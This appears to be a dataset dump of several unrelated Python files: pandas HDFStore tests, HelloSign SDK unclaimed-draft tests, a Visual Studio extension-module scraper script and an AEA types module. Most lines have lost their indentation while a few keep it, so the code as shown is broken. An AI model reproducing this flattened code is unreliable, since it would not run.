df.to_hdf(path, 'df', format='table', data_columns=True)
result = read_hdf(path, 'df', where='obsids=B')
tm.assert_frame_equal(result, expected)
def test_categorical_nan_only_columns(self):
# GH18413
        # Check that categorical columns containing only NaN values survive
        # a to_hdf/read_hdf round trip.
df = pd.DataFrame({
'a': ['a', 'b', 'c', np.nan],
'b': [np.nan, np.nan, np.nan, np.nan],
'c': [1, 2, 3, 4],
'd': pd.Series([None] * 4, dtype=object)
})
df['a'] = df.a.astype('category')
df['b'] = df.b.astype('category')
        df['d'] = df.d.astype('category')
expected = df
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', format='table', data_columns=True)
result = read_hdf(path, 'df')
tm.assert_frame_equal(result, expected)
def test_duplicate_column_name(self):
df = DataFrame(columns=["a", "a"], data=[[0, 0]])
with ensure_clean_path(self.path) as path:
pytest.raises(ValueError, df.to_hdf,
path, 'df', format='fixed')
df.to_hdf(path, 'df', format='table')
other = read_hdf(path, 'df')
tm.assert_frame_equal(df, other)
assert df.equals(other)
assert other.equals(df)
def test_round_trip_equals(self):
# GH 9330
df = DataFrame({"B": [1, 2], "A": ["x", "y"]})
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', format='table')
other = read_hdf(path, 'df')
tm.assert_frame_equal(df, other)
assert df.equals(other)
assert other.equals(df)
def test_preserve_timedeltaindex_type(self):
# GH9635
# Storing TimedeltaIndexed DataFrames in fixed stores did not preserve
# the type of the index.
df = DataFrame(np.random.normal(size=(10, 5)))
df.index = timedelta_range(
start='0s', periods=10, freq='1s', name='example')
with ensure_clean_store(self.path) as store:
store['df'] = df
assert_frame_equal(store['df'], df)
def test_columns_multiindex_modified(self):
# BUG: 7212
        # read_hdf / store.select modified the passed `columns` parameter
        # when the frame had a MultiIndex.
df = DataFrame(np.random.rand(4, 5),
index=list('abcd'),
columns=list('ABCDE'))
df.index.name = 'letters'
df = df.set_index(keys='E', append=True)
data_columns = df.index.names + df.columns.tolist()
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df',
mode='a',
append=True,
data_columns=data_columns,
index=False)
cols2load = list('BCD')
cols2load_original = list(cols2load)
df_loaded = read_hdf(path, 'df', columns=cols2load) # noqa
assert cols2load_original == cols2load
def test_to_hdf_with_object_column_names(self):
# GH9057
# Writing HDF5 table format should only work for string-like
# column types
types_should_fail = [tm.makeIntIndex, tm.makeFloatIndex,
tm.makeDateIndex, tm.makeTimedeltaIndex,
tm.makePeriodIndex]
types_should_run = [tm.makeStringIndex, tm.makeCategoricalIndex]
if compat.PY3:
types_should_run.append(tm.makeUnicodeIndex)
else:
types_should_fail.append(tm.makeUnicodeIndex)
for index in types_should_fail:
df = DataFrame(np.random.randn(10, 2), columns=index(2))
with ensure_clean_path(self.path) as path:
with catch_warnings(record=True):
with pytest.raises(
ValueError, msg=("cannot have non-object label "
"DataIndexableCol")):
df.to_hdf(path, 'df', format='table',
data_columns=True)
for index in types_should_run:
df = DataFrame(np.random.randn(10, 2), columns=index(2))
with ensure_clean_path(self.path) as path:
with catch_warnings(record=True):
df.to_hdf(path, 'df', format='table', data_columns=True)
result = pd.read_hdf(
path, 'df', where="index = [{0}]".format(df.index[0]))
assert(len(result))
def test_read_hdf_open_store(self):
# GH10330
        # No check for non-string path_or_buf, and no test of open store
df = DataFrame(np.random.rand(4, 5),
index=list('abcd'),
columns=list('ABCDE'))
df.index.name = 'letters'
df = df.set_index(keys='E', append=True)
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', mode='w')
direct = read_hdf(path, 'df')
store = HDFStore(path, mode='r')
indirect = read_hdf(store, 'df')
tm.assert_frame_equal(direct, indirect)
assert store.is_open
store.close()
def test_read_hdf_iterator(self):
df = DataFrame(np.random.rand(4, 5),
index=list('abcd'),
columns=list('ABCDE'))
df.index.name = 'letters'
df = df.set_index(keys='E', append=True)
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', mode='w', format='t')
direct = read_hdf(path, 'df')
iterator = read_hdf(path, 'df', iterator=True)
assert isinstance(iterator, TableIterator)
indirect = next(iterator.__iter__())
tm.assert_frame_equal(direct, indirect)
iterator.store.close()
def test_read_hdf_errors(self):
df = DataFrame(np.random.rand(4, 5),
index=list('abcd'),
columns=list('ABCDE'))
with ensure_clean_path(self.path) as path:
pytest.raises(IOError, read_hdf, path, 'key')
df.to_hdf(path, 'df')
store = HDFStore(path, mode='r')
store.close()
pytest.raises(IOError, read_hdf, store, 'df')
def test_read_hdf_generic_buffer_errors(self):
pytest.raises(NotImplementedError, read_hdf, BytesIO(b''), 'df')
def test_invalid_complib(self):
df = DataFrame(np.random.rand(4, 5),
index=list('abcd'),
columns=list('ABCDE'))
with ensure_clean_path(self.path) as path:
with pytest.raises(ValueError):
df.to_hdf(path, 'df', complib='foolib')
# GH10443
def test_read_nokey(self):
df = DataFrame(np.random.rand(4, 5),
index=list('abcd'),
columns=list('ABCDE'))
# Categorical dtype not supported for "fixed" format. So no need
# to test with that dtype in the dataframe here.
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', mode='a')
reread = read_hdf(path)
assert_frame_equal(df, reread)
df.to_hdf(path, 'df2', mode='a')
pytest.raises(ValueError, read_hdf, path)
def test_read_nokey_table(self):
# GH13231
df = DataFrame({'i': range(5),
'c': Series(list('abacd'), dtype='category')})
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', mode='a', format='table')
reread = read_hdf(path)
assert_frame_equal(df, reread)
df.to_hdf(path, 'df2', mode='a', format='table')
pytest.raises(ValueError, read_hdf, path)
def test_read_nokey_empty(self):
with ensure_clean_path(self.path) as path:
store = HDFStore(path)
store.close()
pytest.raises(ValueError, read_hdf, path)
@td.skip_if_no('pathlib')
def test_read_from_pathlib_path(self):
# GH11773
from pathlib import Path
expected = DataFrame(np.random.rand(4, 5),
index=list('abcd'),
columns=list('ABCDE'))
with ensure_clean_path(self.path) as filename:
path_obj = Path(filename)
expected.to_hdf(path_obj, 'df', mode='a')
actual = read_hdf(path_obj, 'df')
tm.assert_frame_equal(expected, actual)
@td.skip_if_no('py.path')
def test_read_from_py_localpath(self):
# GH11773
from py.path import local as LocalPath
expected = DataFrame(np.random.rand(4, 5),
index=list('abcd'),
columns=list('ABCDE'))
with ensure_clean_path(self.path) as filename:
path_obj = LocalPath(filename)
expected.to_hdf(path_obj, 'df', mode='a')
actual = read_hdf(path_obj, 'df')
tm.assert_frame_equal(expected, actual)
def test_query_long_float_literal(self):
# GH 14241
df = pd.DataFrame({'A': [1000000000.0009,
1000000000.0011,
1000000000.0015]})
with ensure_clean_store(self.path) as store:
store.append('test', df, format='table', data_columns=True)
cutoff = 1000000000.0006
result = store.select('test', "A < %.4f" % cutoff)
assert result.empty
cutoff = 1000000000.0010
result = store.select('test', "A > %.4f" % cutoff)
expected = df.loc[[1, 2], :]
tm.assert_frame_equal(expected, result)
exact = 1000000000.0011
result = store.select('test', 'A == %.4f' % exact)
expected = df.loc[[1], :]
tm.assert_frame_equal(expected, result)
def test_query_compare_column_type(self):
# GH 15492
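        # Values in a where clause must be comparable with the column type:
        # non-string values against a string column raise TypeError, strings
        # that cannot be converted to the column type raise ValueError, and
        # convertible strings are coerced before comparison.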
df = pd.DataFrame({'date': ['2014-01-01', '2014-01-02'],
'real_date': date_range('2014-01-01', periods=2),
'float': [1.1, 1.2],
'int': [1, 2]},
columns=['date', 'real_date', 'float', 'int'])
with ensure_clean_store(self.path) as store:
store.append('test', df, format='table', data_columns=True)
ts = pd.Timestamp('2014-01-01') # noqa
result = store.select('test', where='real_date > ts')
expected = df.loc[[1], :]
tm.assert_frame_equal(expected, result)
for op in ['<', '>', '==']:
# non strings to string column always fail
for v in [2.1, True, pd.Timestamp('2014-01-01'),
pd.Timedelta(1, 's')]:
query = 'date {op} v'.format(op=op)
with pytest.raises(TypeError):
result = store.select('test', where=query)
# strings to other columns must be convertible to type
v = 'a'
for col in ['int', 'float', 'real_date']:
query = '{col} {op} v'.format(op=op, col=col)
with pytest.raises(ValueError):
result = store.select('test', where=query)
for v, col in zip(['1', '1.1', '2014-01-01'],
['int', 'float', 'real_date']):
query = '{col} {op} v'.format(op=op, col=col)
result = store.select('test', where=query)
if op == '==':
expected = df.loc[[0], :]
elif op == '>':
expected = df.loc[[1], :]
else:
expected = df.loc[[], :]
tm.assert_frame_equal(expected, result)
@pytest.mark.parametrize('format', ['fixed', 'table'])
def test_read_hdf_series_mode_r(self, format):
# GH 16583
# Tests that reading a Series saved to an HDF file
# still works if a mode='r' argument is supplied
series = tm.makeFloatSeries()
with ensure_clean_path(self.path) as path:
series.to_hdf(path, key='data', format=format)
result = pd.read_hdf(path, key='data', mode='r')
tm.assert_series_equal(result, series)
@pytest.mark.skipif(not PY36, reason="Need python 3.6")
def test_fspath(self):
with tm.ensure_clean('foo.h5') as path:
with pd.HDFStore(path) as store:
assert os.fspath(store) == str(path)
def test_read_py2_hdf_file_in_py3(self):
# GH 16781
# tests reading a PeriodIndex DataFrame written in Python2 in Python3
# the file was generated in Python 2.7 like so:
#
# df = pd.DataFrame([1.,2,3], index=pd.PeriodIndex(
# ['2015-01-01', '2015-01-02', '2015-01-05'], freq='B'))
# df.to_hdf('periodindex_0.20.1_x86_64_darwin_2.7.13.h5', 'p')
expected = pd.DataFrame([1., 2, 3], index=pd.PeriodIndex(
['2015-01-01', '2015-01-02', '2015-01-05'], freq='B'))
with ensure_clean_store(
tm.get_data_path(
'legacy_hdf/periodindex_0.20.1_x86_64_darwin_2.7.13.h5'),
mode='r') as store:
result = store['p']
assert_frame_equal(result, expected)
class TestHDFComplexValues(Base):
# GH10447
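    # Complex values round-trip through both fixed and table formats, but
    # they cannot be made data_columns (TypeError), and a complex Series
    # can only be stored as a table with index=False.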
def test_complex_fixed(self):
df = DataFrame(np.random.rand(4, 5).astype(np.complex64),
index=list('abcd'),
columns=list('ABCDE'))
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df')
reread = read_hdf(path, 'df')
assert_frame_equal(df, reread)
df = DataFrame(np.random.rand(4, 5).astype(np.complex128),
index=list('abcd'),
columns=list('ABCDE'))
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df')
reread = read_hdf(path, 'df')
assert_frame_equal(df, reread)
def test_complex_table(self):
df = DataFrame(np.random.rand(4, 5).astype(np.complex64),
index=list('abcd'),
columns=list('ABCDE'))
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', format='table')
reread = read_hdf(path, 'df')
assert_frame_equal(df, reread)
df = DataFrame(np.random.rand(4, 5).astype(np.complex128),
index=list('abcd'),
columns=list('ABCDE'))
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', format='table', mode='w')
reread = read_hdf(path, 'df')
assert_frame_equal(df, reread)
def test_complex_mixed_fixed(self):
complex64 = np.array([1.0 + 1.0j, 1.0 + 1.0j,
1.0 + 1.0j, 1.0 + 1.0j], dtype=np.complex64)
complex128 = np.array([1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j],
dtype=np.complex128)
df = DataFrame({'A': [1, 2, 3, 4],
'B': ['a', 'b', 'c', 'd'],
'C': complex64,
'D': complex128,
'E': [1.0, 2.0, 3.0, 4.0]},
index=list('abcd'))
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df')
reread = read_hdf(path, 'df')
assert_frame_equal(df, reread)
def test_complex_mixed_table(self):
complex64 = np.array([1.0 + 1.0j, 1.0 + 1.0j,
1.0 + 1.0j, 1.0 + 1.0j], dtype=np.complex64)
complex128 = np.array([1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j],
dtype=np.complex128)
df = DataFrame({'A': [1, 2, 3, 4],
'B': ['a', 'b', 'c', 'd'],
'C': complex64,
'D': complex128,
'E': [1.0, 2.0, 3.0, 4.0]},
index=list('abcd'))
with ensure_clean_store(self.path) as store:
store.append('df', df, data_columns=['A', 'B'])
result = store.select('df', where='A>2')
assert_frame_equal(df.loc[df.A > 2], result)
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', format='table')
reread = read_hdf(path, 'df')
assert_frame_equal(df, reread)
def test_complex_across_dimensions_fixed(self):
with catch_warnings(record=True):
complex128 = np.array(
[1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j])
s = Series(complex128, index=list('abcd'))
df = DataFrame({'A': s, 'B': s})
p = Panel({'One': df, 'Two': df})
objs = [s, df, p]
comps = [tm.assert_series_equal, tm.assert_frame_equal,
tm.assert_panel_equal]
for obj, comp in zip(objs, comps):
with ensure_clean_path(self.path) as path:
obj.to_hdf(path, 'obj', format='fixed')
reread = read_hdf(path, 'obj')
comp(obj, reread)
def test_complex_across_dimensions(self):
complex128 = np.array([1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j])
s = Series(complex128, index=list('abcd'))
df = DataFrame({'A': s, 'B': s})
with catch_warnings(record=True):
p = Panel({'One': df, 'Two': df})
p4d = Panel4D({'i': p, 'ii': p})
objs = [df, p, p4d]
comps = [tm.assert_frame_equal, tm.assert_panel_equal,
tm.assert_panel4d_equal]
for obj, comp in zip(objs, comps):
with ensure_clean_path(self.path) as path:
obj.to_hdf(path, 'obj', format='table')
reread = read_hdf(path, 'obj')
comp(obj, reread)
def test_complex_indexing_error(self):
complex128 = np.array([1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j],
dtype=np.complex128)
df = DataFrame({'A': [1, 2, 3, 4],
'B': ['a', 'b', 'c', 'd'],
'C': complex128},
index=list('abcd'))
with ensure_clean_store(self.path) as store:
pytest.raises(TypeError, store.append,
'df', df, data_columns=['C'])
def test_complex_series_error(self):
complex128 = np.array([1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j, 1.0 + 1.0j])
s = Series(complex128, index=list('abcd'))
with ensure_clean_path(self.path) as path:
pytest.raises(TypeError, s.to_hdf, path, 'obj', format='t')
with ensure_clean_path(self.path) as path:
s.to_hdf(path, 'obj', format='t', index=False)
reread = read_hdf(path, 'obj')
tm.assert_series_equal(s, reread)
def test_complex_append(self):
df = DataFrame({'a': np.random.randn(100).astype(np.complex128),
'b': np.random.randn(100)})
with ensure_clean_store(self.path) as store:
store.append('df', df, data_columns=['b'])
store.append('df', df)
result = store.select('df')
            assert_frame_equal(pd.concat([df, df], axis=0), result)
class TestTimezones(Base):
def _compare_with_tz(self, a, b):
tm.assert_frame_equal(a, b)
# compare the zones on each element
for c in a.columns:
for i in a.index:
a_e = a.loc[i, c]
b_e = b.loc[i, c]
if not (a_e == b_e and a_e.tz == b_e.tz):
raise AssertionError(
"invalid tz comparison [%s] [%s]" % (a_e, b_e))
def test_append_with_timezones_dateutil(self):
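        # tz-aware values (here with dateutil timezones) survive append and
        # select with their zone intact, both as data columns and as the
        # index; appending rows whose tz differs from what is already stored
        # raises ValueError.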
from datetime import timedelta
# use maybe_get_tz instead of dateutil.tz.gettz to handle the windows
# filename issues.
from pandas._libs.tslibs.timezones import maybe_get_tz
gettz = lambda x: maybe_get_tz('dateutil/' + x)
# as columns
with ensure_clean_store(self.path) as store:
_maybe_remove(store, 'df_tz')
df = DataFrame(dict(A=[Timestamp('20130102 2:00:00', tz=gettz(
'US/Eastern')) + timedelta(hours=1) * i for i in range(5)]))
store.append('df_tz', df, data_columns=['A'])
result = store['df_tz']
self._compare_with_tz(result, df)
assert_frame_equal(result, df)
# select with tz aware
expected = df[df.A >= df.A[3]]
result = store.select('df_tz', where='A>=df.A[3]')
self._compare_with_tz(result, expected)
# ensure we include dates in DST and STD time here.
_maybe_remove(store, 'df_tz')
df = DataFrame(dict(A=Timestamp('20130102',
tz=gettz('US/Eastern')),
B=Timestamp('20130603',
tz=gettz('US/Eastern'))),
index=range(5))
store.append('df_tz', df)
result = store['df_tz']
self._compare_with_tz(result, df)
assert_frame_equal(result, df)
df = DataFrame(dict(A=Timestamp('20130102',
tz=gettz('US/Eastern')),
B=Timestamp('20130102', tz=gettz('EET'))),
index=range(5))
pytest.raises(ValueError, store.append, 'df_tz', df)
# this is ok
_maybe_remove(store, 'df_tz')
store.append('df_tz', df, data_columns=['A', 'B'])
result = store['df_tz']
self._compare_with_tz(result, df)
assert_frame_equal(result, df)
# can't append with diff timezone
df = DataFrame(dict(A=Timestamp('20130102',
tz=gettz('US/Eastern')),
B=Timestamp('20130102', tz=gettz('CET'))),
index=range(5))
pytest.raises(ValueError, store.append, 'df_tz', df)
# as index
with ensure_clean_store(self.path) as store:
# GH 4098 example
df = DataFrame(dict(A=Series(lrange(3), index=date_range(
'2000-1-1', periods=3, freq='H', tz=gettz('US/Eastern')))))
_maybe_remove(store, 'df')
store.put('df', df)
result = store.select('df')
assert_frame_equal(result, df)
_maybe_remove(store, 'df')
store.append('df', df)
result = store.select('df')
assert_frame_equal(result, df)
def test_append_with_timezones_pytz(self):
from datetime import timedelta
# as columns
with ensure_clean_store(self.path) as store:
_maybe_remove(store, 'df_tz')
df = DataFrame(dict(A=[Timestamp('20130102 2:00:00',
tz='US/Eastern') +
timedelta(hours=1) * i
for i in range(5)]))
store.append('df_tz', df, data_columns=['A'])
result = store['df_tz']
self._compare_with_tz(result, df)
assert_frame_equal(result, df)
# select with tz aware
self._compare_with_tz(store.select(
'df_tz', where='A>=df.A[3]'), df[df.A >= df.A[3]])
_maybe_remove(store, 'df_tz')
# ensure we include dates in DST and STD time here.
df = DataFrame(dict(A=Timestamp('20130102', tz='US/Eastern'),
B=Timestamp('20130603', tz='US/Eastern')),
index=range(5))
store.append('df_tz', df)
result = store['df_tz']
self._compare_with_tz(result, df)
assert_frame_equal(result, df)
df = DataFrame(dict(A=Timestamp('20130102', tz='US/Eastern'),
B=Timestamp('20130102', tz='EET')),
index=range(5))
pytest.raises(ValueError, store.append, 'df_tz', df)
# this is ok
_maybe_remove(store, 'df_tz')
store.append('df_tz', df, data_columns=['A', 'B'])
result = store['df_tz']
self._compare_with_tz(result, df)
assert_frame_equal(result, df)
# can't append with diff timezone
df = DataFrame(dict(A=Timestamp('20130102', tz='US/Eastern'),
B=Timestamp('20130102', tz='CET')),
index=range(5))
pytest.raises(ValueError, store.append, 'df_tz', df)
# as index
with ensure_clean_store(self.path) as store:
# GH 4098 example
df = DataFrame(dict(A=Series(lrange(3), index=date_range(
'2000-1-1', periods=3, freq='H', tz='US/Eastern'))))
_maybe_remove(store, 'df')
store.put('df', df)
result = store.select('df')
assert_frame_equal(result, df)
_maybe_remove(store, 'df')
store.append('df', df)
result = store.select('df')
assert_frame_equal(result, df)
def test_tseries_select_index_column(self):
# GH7777
# selecting a UTC datetimeindex column did
# not preserve UTC tzinfo set before storing
# check that no tz still works
rng = date_range('1/1/2000', '1/30/2000')
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
with ensure_clean_store(self.path) as store:
store.append('frame', frame)
result = store.select_column('frame', 'index')
assert rng.tz == DatetimeIndex(result.values).tz
# check utc
rng = date_range('1/1/2000', '1/30/2000', tz='UTC')
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
with ensure_clean_store(self.path) as store:
store.append('frame', frame)
result = store.select_column('frame', 'index')
assert rng.tz == result.dt.tz
# double check non-utc
rng = date_range('1/1/2000', '1/30/2000', tz='US/Eastern')
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
with ensure_clean_store(self.path) as store:
store.append('frame', frame)
result = store.select_column('frame', 'index')
assert rng.tz == result.dt.tz
def test_timezones_fixed(self):
with ensure_clean_store(self.path) as store:
# index
rng = date_range('1/1/2000', '1/30/2000', tz='US/Eastern')
df = DataFrame(np.random.randn(len(rng), 4), index=rng)
store['df'] = df
result = store['df']
assert_frame_equal(result, df)
# as data
# GH11411
_maybe_remove(store, 'df')
df = DataFrame({'A': rng,
'B': rng.tz_convert('UTC').tz_localize(None),
'C': rng.tz_convert('CET'),
'D': range(len(rng))}, index=rng)
store['df'] = df
result = store['df']
assert_frame_equal(result, df)
def test_fixed_offset_tz(self):
rng = date_range('1/1/2000 00:00:00-07:00', '1/30/2000 00:00:00-07:00')
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
with ensure_clean_store(self.path) as store:
store['frame'] = frame
recons = store['frame']
tm.assert_index_equal(recons.index, rng)
assert rng.tz == recons.index.tz
@td.skip_if_windows
def test_store_timezone(self):
# GH2852
# issue storing datetime.date with a timezone as it resets when read
# back in a new timezone
# original method
with ensure_clean_store(self.path) as store:
today = datetime.date(2013, 9, 10)
df = DataFrame([1, 2, 3], index=[today, today, today])
store['obj1'] = df
result = store['obj1']
assert_frame_equal(result, df)
# with tz setting
with ensure_clean_store(self.path) as store:
with set_timezone('EST5EDT'):
today = datetime.date(2013, 9, 10)
df = DataFrame([1, 2, 3], index=[today, today, today])
store['obj1'] = df
with set_timezone('CST6CDT'):
result = store['obj1']
assert_frame_equal(result, df)
def test_legacy_datetimetz_object(self):
# legacy from < 0.17.0
# 8260
expected = DataFrame(dict(A=Timestamp('20130102', tz='US/Eastern'),
B=Timestamp('20130603', tz='CET')),
index=range(5))
with ensure_clean_store(
tm.get_data_path('legacy_hdf/datetimetz_object.h5'),
mode='r') as store:
result = store['df']
assert_frame_equal(result, expected)
def test_dst_transitions(self):
# make sure we are not failing on transitions
with ensure_clean_store(self.path) as store:
times = pd.date_range("2013-10-26 23:00", "2013-10-27 01:00",
tz="Europe/London",
freq="H",
ambiguous='infer')
for i in [times, times + pd.Timedelta('10min')]:
_maybe_remove(store, 'df')
df = DataFrame({'A': range(len(i)), 'B': i}, index=i)
store.append('df', df)
result = store.select('df')
assert_frame_equal(result, df)
|
py | b40351504fcc97e1b1515a029431041b8ad53447 | from hellosign_sdk.tests.functional_tests import BaseTestCase
from hellosign_sdk.resource import UnclaimedDraft
from hellosign_sdk.utils import HSException
import os
#
# The MIT License (MIT)
#
# Copyright (C) 2014 hellosign.com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
class TestUnclaimedDraft(BaseTestCase):
def test_unclaimed_draft(self):
''' Test creating an unclaimed draft '''
files = [os.path.dirname(os.path.realpath(__file__)) + "/docs/nda.pdf"]
signers = [{"name": "Signer Name", "email_address": "[email protected]"}]
cc_email_addresses = ["[email protected]"]
draft_type = UnclaimedDraft.UNCLAIMED_DRAFT_REQUEST_SIGNATURE_TYPE
metadata = {
'account_id': '123',
'company_name': 'Acme Co.'
}
try:
self.client.create_unclaimed_draft(
test_mode=True,
files=[],
file_urls=[],
draft_type=draft_type,
subject="Test unclaimed draft",
message="Please do not reply to the messages",
signers=signers,
cc_email_addresses=cc_email_addresses)
self.fail('Validation error expected')
except HSException:
pass
result = self.client.create_unclaimed_draft(
test_mode=True,
files=files,
file_urls=[],
draft_type=draft_type,
subject="Test unclaimed draft",
message="Please do not reply to the messages",
signers=signers,
cc_email_addresses=cc_email_addresses,
metadata=metadata,
allow_decline=True)
self.assertEqual(isinstance(result, UnclaimedDraft), True)
def test_embedded_unclaimed_draft(self):
''' Test creating an embedded unclaimed draft '''
files = [os.path.dirname(os.path.realpath(__file__)) + "/docs/nda.pdf"]
signers = [{"name": "Signer Name", "email_address": "[email protected]"}]
cc_email_addresses = ["[email protected]"]
draft_type = UnclaimedDraft.UNCLAIMED_DRAFT_REQUEST_SIGNATURE_TYPE
metadata = {
'account_id': '123',
'company_name': 'Acme Co.'
}
try:
# Missing required parameter
# test_mode=False, client_id=None, is_for_embedded_signing=False, requester_email_address=None, files=None, file_urls=None, draft_type=None,
# subject=None, message=None, signers=None, cc_email_addresses=None, signing_redirect_url=None, requesting_redirect_url=None, form_fields_per_document=None
self.client.create_embedded_unclaimed_draft(
test_mode=True,
client_id=self.client_id,
is_for_embedded_signing=True,
requester_email_address="[email protected]",
files=[],
file_urls=[],
draft_type=draft_type,
subject="Test unclaimed draft",
message="Please do not reply to the messages",
signers=signers,
cc_email_addresses=cc_email_addresses)
self.fail('Validation error expected')
except HSException:
pass
result = self.client.create_embedded_unclaimed_draft(
test_mode=True,
client_id=self.client_id,
is_for_embedded_signing=True,
requester_email_address="[email protected]",
files=files,
file_urls=[],
draft_type=draft_type,
subject="Test unclaimed draft",
message="Please do not reply to the messages",
signers=signers,
cc_email_addresses=cc_email_addresses,
metadata=metadata,
allow_decline=False)
self.assertEqual(isinstance(result, UnclaimedDraft), True)
def test_create_embedded_unclaimed_draft_with_template(self):
''' Test creating an embedded unclaimed draft from a template '''
signers = [{
"name": "Signer Name",
"email_address": "[email protected]",
"role_name": "Signer"
}]
metadata = {
'account_id': '123',
'company_name': 'Acme Co.'
}
template = self._get_one_template()
template_id = template.template_id
try:
# Missing required parameter
self.client.create_embedded_unclaimed_draft_with_template(
test_mode=True,
client_id=self.client_id,
is_for_embedded_signing=True,
#missing - template_id
requester_email_address='[email protected]',
title='MyDraft',
subject='Unclaimed Draft Email Subject',
message='Email Message',
signers=signers,
signing_redirect_url='http://url.com',
requesting_redirect_url='http://url.com',
metadata=metadata)
self.fail('Validation error expected')
except HSException:
pass
returned = self.client.create_embedded_unclaimed_draft_with_template(
test_mode=True,
client_id=self.client_id,
is_for_embedded_signing=True,
template_id=template_id,
requester_email_address='[email protected]',
title='MyDraft',
subject='Unclaimed Draft Email Subject',
message='Email Message',
signers=signers,
signing_redirect_url='http://url.com',
requesting_redirect_url='http://url.com',
metadata=metadata,
allow_decline=False)
self.assertEqual(isinstance(returned, UnclaimedDraft), True)
def _get_one_template(self, exclude=None):
''' Get one template from the current account '''
template_list = self.client.get_template_list()
if not template_list or len(template_list) == 0:
self.fail('CREATE A TEMPLATE BEFORE RUNNING THIS TEST')
if exclude is None:
return template_list[0]
else:
for t in template_list:
if t.template_id != exclude.template_id:
return t
self.fail('CREATE A SECOND TEMPLATE BEFORE RUNNING THIS TEST')
|
py | b40351db2d163dfc05a2f87586829f2c87f2d6f1 | # ############################################################################
#
# Copyright (c) Microsoft Corporation.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# [email protected]. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
# ###########################################################################
import sys
import PythonScraper
try:
# disable error reporting in our process, bad extension modules can crash us, and we don't
# want a bunch of Watson boxes popping up...
import ctypes
ctypes.windll.kernel32.SetErrorMode(3) # SEM_FAILCRITICALERRORS / SEM_NOGPFAULTERRORBOX
except:
pass
# Scrapes the file and saves the analysis to the specified filename, exits w/ nonzero exit code if anything goes wrong.
# Usage: ExtensionScraper.py scrape [mod_name or '-'] [mod_path or '-'] [output_path]
if len(sys.argv) != 5 or sys.argv[1].lower() != 'scrape':
raise ValueError("Expects \"ExtensionScraper.py scrape [mod_name|'-'] [mod_path|'-'] [output_path]\"")
mod_name, mod_path, output_path = sys.argv[2:]
module = None
if mod_name and mod_name != '-':
remove_sys_path_0 = False
try:
if mod_path and mod_path != '-':
import os.path
if os.path.exists(mod_path):
sys.path.insert(0, mod_path)
remove_sys_path_0 = True
__import__(mod_name)
module = sys.modules[mod_name]
finally:
if remove_sys_path_0:
del sys.path[0]
if not module:
print('__import__("' + mod_name + '")')
PythonScraper.write_analysis(output_path, {"members": {}, "doc": "Could not import compiled module"})
elif mod_path and mod_path != '-':
try:
import os.path
mod_name = os.path.split(mod_path)[1].partition('.')[0]
try:
import importlib
module = importlib.import_module(mod_name)
except ImportError:
# Don't really care which import failed - we'll try imp
pass
if not module:
import imp
module = imp.load_dynamic(mod_name, mod_path)
finally:
if not module:
print('imp.load_dynamic("' + mod_name + '", "' + mod_path + '")')
PythonScraper.write_analysis(output_path, {"members": {}, "doc": "Could not import compiled module", "filename": mod_path})
else:
raise ValueError('No module name or path provided')
if module:
analysis = PythonScraper.generate_module(module)
PythonScraper.write_analysis(output_path, analysis)
|
py | b403535e179420599ec1e2408c1898f8134d192b | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2022 Valory AG
# Copyright 2018-2021 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the common types and interfaces used in the aea framework."""
import os
from pathlib import Path
from typing import Any, Dict, List, Optional, Union
Address = str
Primitive = Union[str, int, bool, float]
_JSONDict = Dict[Any, Any] # temporary placeholder
_JSONList = List[Any] # temporary placeholder
_JSONType = Optional[Union[Primitive, _JSONDict, _JSONList]]
